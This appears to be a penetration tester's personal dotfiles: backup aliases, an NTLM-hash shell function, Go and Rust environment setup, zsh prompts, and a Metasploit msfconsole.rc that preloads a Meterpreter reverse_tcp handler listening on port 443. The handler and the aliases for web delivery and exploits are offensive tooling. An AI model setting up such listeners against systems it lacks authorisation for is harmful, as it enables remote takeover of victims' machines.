---

alias syncUSB='rsync -av --delete /home/.../Documents/ /media/.../<media_name>/.../ --progress'
alias syncMEGA='rclone sync ~/Documents/ "<remote_NAME>:/docs_backup/" -P'

ntlm() {
        iconv -f ASCII -t UTF-16LE <(printf "$1") | openssl dgst -md4
}

export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH


. "$HOME/.cargo/env"

PS1='${debian_chroot:+($debian_chroot)}${VIRTUAL_ENV:+($(basename $VIRTUAL_ENV))}[zsh]:%B%F{blue}~%b%F{reset}%(#.#.$) '

PS1='${debian_chroot:+($debian_chroot)}${VIRTUAL_ENV:+($(basename $VIRTUAL_ENV))}[%B%F{red}root%b%F{reset}]~%(#.#.#) '

---

/home/.../.msf4/msfconsole.rc

set PROMPT [S:%S J:%J]
load alias
alias s "sessions"
alias j "jobs"
alias opt "options"
alias -f r "run -j -z"
alias -f exp "exploit -j -z"
alias adv "advanced"
alias -f ch "channel"
alias sr "search"
alias xx "exit"
alias web "use exploit/multi/script/web_delivery"
alias mh "use exploit/multi/handler"
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 443
set lhost 0.0.0.0
clear
